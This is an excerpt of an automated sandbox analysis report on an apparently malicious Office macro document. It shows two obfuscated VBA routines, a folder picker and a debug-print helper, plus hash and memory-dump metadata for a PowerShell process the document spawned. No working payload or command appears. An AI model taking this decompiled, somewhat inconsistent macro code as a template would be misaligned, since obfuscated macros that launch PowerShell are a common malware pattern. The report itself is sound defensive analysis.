      Function dsfl3hadfkb3lkahfoiauhfcfgkwy3jfrkiwed, APIs: 4, Strings: 1, Number of lines: 18, Relevance: 7.518
      APIsMeta Information

      PathSeparator

      Application

      Right$

      Right$

      StringsDecrypted Strings
      ":"
      LineInstructionMeta Information
      9

      Function dsfl3hadfkb3lkahfoiauhfcfgkwy3jfrkiwed(optional ByVal Title as String = ",", optional ByVal InitialPath as String = ":") as String

      10

      Dim PS as String

      10

      PS = Application.PathSeparator

      PathSeparator

      Application

      11

      With Application.FileDialog(msoFileDialogFolderPicker)

      12

      If Not Right$(InitialPath, 1) = PS Then

      Right$

      12

      InitialPath = InitialPath & PS

      12

      Endif

      13

      . ButtonName = ":"

      13

      . Title = Title

      13

      . InitialFileName = InitialPath

      14

      If . Show <> - 1 Then

      14

      Exit Function

      14

      Endif

      15

      If Not Right$(GetFolderPath, 1) = PS Then

      Right$

      15

      GetFolderPath = GetFolderPath & PS

      15

      Endif

      16

      End With

      17

      End Function

      Subroutine dfloaswehortiwholehfolsihlkw, APIs: 2, Strings: 1, Number of lines: 4, Relevance: 4.504
      APIsMeta Information

      FileToVBAFunction

      Print

      StringsDecrypted Strings
      ","
      LineInstructionMeta Information
      23

      Sub dfloaswehortiwholehfolsihlkw()

      24

      txt$ = FileToVBAFunction(",", ",")

      FileToVBAFunction

      25

      Debug.Print txt$

      Print

      26

      End Sub

      Reset < >

        Analysis Process: powershell.exe PID: 2776 Parent PID: 2420 powershell.exeCOMMON

        Executed Functions

        Function 000007FF00261121, Relevance: .1, Instructions: 80COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000004.00000002.443276378.000007FF00260000.00000040.00000001.sdmp, Offset: 000007FF00260000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_7ff00260000_powershell.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: c1252dd2c919e1d5a190e2ab872a6b4b6d3a24d15b6e001cddec133c7cf8ddbb
        • Instruction ID: 8bc04c71c152c975316cebeebba1ce3fdd828d95d4baaca200ec28099c7dd158
        • Opcode Fuzzy Hash: c1252dd2c919e1d5a190e2ab872a6b4b6d3a24d15b6e001cddec133c7cf8ddbb
        • Instruction Fuzzy Hash: 0711966144E3C68FE3038B745C252907FB1AF53254B5A00CBD8C5CA0B3E25D4A6ACB62
        Uniqueness

        Uniqueness Score: -1.00%

        Non-executed Functions

        Function 000007FF00260F3C, Relevance: .1, Instructions: 67COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000004.00000002.443276378.000007FF00260000.00000040.00000001.sdmp, Offset: 000007FF00260000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_7ff00260000_powershell.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 5c90478dfe5a969590b5197933eb184c20530005b81b941c82d525693f168d14
        • Instruction ID: 96a79c208aafb5fe6c733985a6cd2f2520b19b17ce9f10e360e277eff933b4c3
        • Opcode Fuzzy Hash: 5c90478dfe5a969590b5197933eb184c20530005b81b941c82d525693f168d14
        • Instruction Fuzzy Hash: 29F07AA650E3C28FD703477498683903F716F13219F1E00CBD080DF0E3E6584A4AE762
        Uniqueness

        Uniqueness Score: -1.00%